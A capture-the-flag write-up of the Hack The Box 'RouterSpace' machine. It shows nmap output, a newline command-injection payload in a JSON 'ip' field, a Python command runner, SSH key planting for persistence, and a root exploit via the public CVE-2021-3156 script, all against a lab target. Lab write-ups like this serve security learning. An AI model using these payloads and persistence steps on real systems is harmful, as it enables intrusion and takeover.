HTB Writeup: RouterSpace
Tech will overtake the world… Just after solving that captcha real quick.
Enumeration
NMAP Scan
# Nmap 7.92 scan initiated Sun Apr 10 19:53:33 2022 as: nmap -sC -sV -T3 -oN nmap.all-port.txt -vv -p- 10.10.11.148
Nmap scan report for 10.10.11.148 (10.10.11.148)
Host is up, received echo-reply ttl 63 (0.078s latency).
Scanned at 2022-04-10 19:53:39 IST for 138s
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-RouterSpace Packet Filtering V1
| ssh-hostkey:
| 3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTJG10LrPb/oV0/FaR2FprNXTVtRobg1Jwy5UOJGrzjWqI8lNDf5DDi3ilSdkJZ0+0Rwr4/gKG5UlyvqCz07XrPfnWG+E7NrgpMpVKR4LF9fbX750gxK+hOSco3qQclv3CUTjTzwMgxf0ltyOg6WJvThYQ3CFDDeOc4T27YqQ/VgwBT92PWu6aZgWX2oAn+X8/fdcejGWeumU9b+rufiNt/pQ1dGUz+wkHeb2pIaA4WfEQLHB1xF33rTZuAXFDiKSb35EpPvhuShsMPQv6Q+NfLAiENgdy+UdybSNH6k1gmPHyroSYoXth7Pelpg+38V9SYtvvoxQRqBbaLApEClTnIM/IvQba9vY8VdfKYDGDcgeuPm8ksnOFPrb5L6axwl0K2ngE4VHQBJM0yxIRo5dELswD1c9O1tR2rq6MbW2giPl6dx/xzEbdVV6VO5n/prjsnpEs8YvNmnELrt6mt0FkcJQ9ageN5ji3pecKxKTVY4J71yf4+cVZKwpX8xI5H6E=
| 256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDiksdoNGb5HSVU5I64JPbS+qDrMnHaxiFkU+JKFH9VnP69mvgdIM9wTDl/WGjeWV2AJsl7NLQQ4W0goFL/Kz48=
| 256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP2psOHQ+E45S1f8MOulwczO6MLHRMr+DYtiyNM0SJw8
80/tcp open http syn-ack ttl 63
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 017FE5BB3BCC0B9C531C0B9402C701FC
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-49027
| Content-Type: text/html; charset=utf-8
| Content-Length: 71
| ETag: W/"47-T64tMSKD7uSVSzvAfvdqZJPKFTg"
| Date: Sun, 10 Apr 2022 14:25:47 GMT
| Connection: close
| Suspicious activity detected !!! {RequestID: 90tTo XoP n klD 5 TZ }
| GetRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-50696
| Accept-Ranges: bytes
| Cache-Control: public, max-age=0
| Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
| ETag: W/"652c-17d476c9285"
| Content-Type: text/html; charset=UTF-8
| Content-Length: 25900
| Date: Sun, 10 Apr 2022 14:25:46 GMT
| Connection: close
| <!doctype html>
| <html class="no-js" lang="zxx">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>RouterSpace</title>
| <meta name="description" content="">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="stylesheet" href="css/bootstrap.min.css">
| <link rel="stylesheet" href="css/owl.carousel.min.css">
| <link rel="stylesheet" href="css/magnific-popup.css">
| <link rel="stylesheet" href="css/font-awesome.min.css">
| <link rel="stylesheet" href="css/themify-icons.css">
| HTTPOptions:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-32396
| Allow: GET,HEAD,POST
| Content-Type: text/html; charset=utf-8
| Content-Length: 13
| ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
| Date: Sun, 10 Apr 2022 14:25:46 GMT
| Connection: close
| GET,HEAD,POST
| RTSPRequest, X11Probe:
| HTTP/1.1 400 Bad Request
|_ Connection: close
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: RouterSpace
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.92%I=7%D=4/10%Time=6252E8E8%P=x86_64-pc-linux-gnu%r(NULL
SF:,29,"SSH-2\.0-RouterSpace\x20Packet\x20Filtering\x20V1\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.92%I=7%D=4/10%Time=6252E8E9%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,13E4,"HTTP/1\.1\x20200\x20OK\r\nX-Powered-By:\x20RouterSpace\r\n
SF:X-Cdn:\x20RouterSpace-50696\r\nAccept-Ranges:\x20bytes\r\nCache-Control
SF::\x20public,\x20max-age=0\r\nLast-Modified:\x20Mon,\x2022\x20Nov\x20202
SF:1\x2011:33:57\x20GMT\r\nETag:\x20W/\"652c-17d476c9285\"\r\nContent-Type
SF::\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x2025900\r\nDate:\x
SF:20Sun,\x2010\x20Apr\x202022\x2014:25:46\x20GMT\r\nConnection:\x20close\
SF:r\n\r\n<!doctype\x20html>\n<html\x20class=\"no-js\"\x20lang=\"zxx\">\n<
SF:head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20<me
SF:ta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\x20\
SF:x20\x20<title>RouterSpace</title>\n\x20\x20\x20\x20<meta\x20name=\"desc
SF:ription\"\x20content=\"\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\
SF:x20content=\"width=device-width,\x20initial-scale=1\">\n\n\x20\x20\x20\
SF:x20<link\x20rel=\"stylesheet\"\x20href=\"css/bootstrap\.min\.css\">\n\x
SF:20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/owl\.carousel\.
SF:min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/
SF:magnific-popup\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20
SF:href=\"css/font-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"st
SF:ylesheet\"\x20href=\"css/themify-icons\.css\">\n\x20")%r(HTTPOptions,10
SF:8,"HTTP/1\.1\x20200\x20OK\r\nX-Powered-By:\x20RouterSpace\r\nX-Cdn:\x20
SF:RouterSpace-32396\r\nAllow:\x20GET,HEAD,POST\r\nContent-Type:\x20text/h
SF:tml;\x20charset=utf-8\r\nContent-Length:\x2013\r\nETag:\x20W/\"d-bMedpZ
SF:YGrVt1nR4x\+qdNZ2GqyRo\"\r\nDate:\x20Sun,\x2010\x20Apr\x202022\x2014:25
SF::46\x20GMT\r\nConnection:\x20close\r\n\r\nGET,HEAD,POST")%r(RTSPRequest
SF:,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n
SF:")%r(X11Probe,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20
SF:close\r\n\r\n")%r(FourOhFourRequest,12D,"HTTP/1\.1\x20200\x20OK\r\nX-Po
SF:wered-By:\x20RouterSpace\r\nX-Cdn:\x20RouterSpace-49027\r\nContent-Type
SF::\x20text/html;\x20charset=utf-8\r\nContent-Length:\x2071\r\nETag:\x20W
SF:/\"47-T64tMSKD7uSVSzvAfvdqZJPKFTg\"\r\nDate:\x20Sun,\x2010\x20Apr\x2020
SF:22\x2014:25:47\x20GMT\r\nConnection:\x20close\r\n\r\nSuspicious\x20acti
SF:vity\x20detected\x20!!!\x20{RequestID:\x2090tTo\x20\x20XoP\x20n\x20klD\
SF:x205\x20TZ\x20}\n\n\n");
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 10 19:55:57 2022 -- 1 IP address (1 host up) scanned in 143.62 seconds
Important Findings:
- Web Server at TCP/80
- SSH Server at TCP/22
User Access
- Website visited at TCP/80
- An android app was provided on the website named
RouterSpace.apk
-
Static Analysis
A static analysis was performed using MobSF, no interesting data found.
-
Dynamic Analysis
-
The app was loaded onto an Android Emulator with Android API 23 and traffic was intercepted using BurpSuite.
-
A HTTP Request to the website
routerspace.htb
was captured. (To make it work, manual entry of domain resolution to HTB IP was appended to/etc/hosts
of the Android Virtual Device ) -
Request
POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1 accept: application/json, text/plain, */* user-agent: RouterSpaceAgent Content-Type: application/json Content-Length: 16 Host: routerspace.htb Connection: close Accept-Encoding: gzip, deflate {"ip":"0.0.0.0"}
iv. Response
HTTP/1.1 200 OK X-Powered-By: RouterSpace X-Cdn: RouterSpace-13489 Content-Type: application/json; charset=utf-8 Content-Length: 11 ETag: W/"b-ANdgA/PInoUrpfEatjy5cxfJOCY" Date: Mon, 11 Apr 2022 00:28:24 GMT Connection: close "0.0.0.0\n"
v. The web server running was vulnerable to Command Execution by adding command in
ip
key of the JSON requestPOST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1 accept: application/json, text/plain, */* user-agent: RouterSpaceAgent Content-Type: application/json Content-Length: 13 Host: routerspace.htb Connection: close Accept-Encoding: gzip, deflate {"ip":"\nid"} HTTP/1.1 200 OK X-Powered-By: RouterSpace X-Cdn: RouterSpace-99707 Content-Type: application/json; charset=utf-8 Content-Length: 53 ETag: W/"35-ERWpoCDHm08FgkJsyQjiOS48qOc" Date: Mon, 11 Apr 2022 09:07:18 GMT Connection: close "\nuid=1001(paul) gid=1001(paul) groups=1001(paul)\n"
vi. A python script was created to run commands and parse output
#!/usr/bin/env python3 import requests import json import sys headers = {"Content-Type" : "application/json", "User-Agent":"RouterSpaceAgent"} url = "http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess" def start_rev_shell(command): body = {"ip":f"\n{command}"} resp = requests.post(url, headers=headers, data=json.dumps(body)) print(json.loads(resp.text)) if __name__ == "__main__": start_rev_shell(sys.argv[1])
vii. SSH Key was added to User’s
authorized_keys
file in order to get a shell access and persistence./remote_shell.py "echo -n $(cat ./routerspace-paul.pub) > /home/paul/.ssh/authorized_keys" ssh -i ./routerspace-paul [email protected] Last login: Mon Apr 11 07:57:18 2022 from 10.10.14.124 paul@routerspace:~$
-
-
Privilege Escalation
-
Enumeration was done using
linPEASS
╔══════════╣ Sudo version ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version Sudo version 1.8.31 ╔══════════╣ CVEs Check [+] [CVE-2021-3156] sudo Baron Samedit Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: probable Tags: mint=19,[ ubuntu=18|20 ], debian=10 Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
-
The remote target is vulnerable to
CVE-2021-3156
-
Exploit available on
https://raw.githubusercontent.com/worawit/CVE-2021-3156/main/exploit_nss.py
was downloaded, uploaded on the target and executed to obtain a shell withid=0
(root
privileges)➜ mostwanted002@Loki RouterSpace scp -i ./routerspace-paul ./exploit_nss.py [email protected]:/tmp/exploit.py exploit_nss.py paul@routerspace:~$ python3 /tmp/exploit.py # id uid=0(root) gid=0(root) groups=0(root),1001(paul) # cat /root/root.txt 9b6cae1c5e9ecf5326deb28ef79543ef #
The remote target is now completely compromised.